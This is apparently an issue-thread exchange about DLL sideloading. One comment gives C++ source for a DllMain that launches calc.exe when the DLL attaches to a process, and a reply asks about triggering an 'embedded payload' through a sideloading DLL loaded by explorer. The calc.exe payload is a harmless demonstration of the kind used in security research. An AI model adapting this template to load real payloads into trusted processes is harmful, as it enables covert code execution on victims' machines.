0xda568
commented
2 months ago Hey, sorry for the late response. The DLL just creates an calc.exe process when it gets attached to a process. After compiling it, I just added a random icon to it using Resource Hacker, but it also should work without an icon.
This is the code I used, make sure to compile the DLL for x64 (if you're running a x64 system):
// dllmain.cpp : Defines the entry point for the DLL application.
#include "pch.h"
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved){
switch (ul_reason_for_call){
case DLL_PROCESS_ATTACH: {
STARTUPINFO si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
CreateProcess(L"C:\\Windows\\System32\\calc.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
break;
}
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
Could you please drop some details on the dll that you crafted. It does not publish any export functions and my own universal sideloading DLL will not trigger the embedded payload when it is loaded by the explorer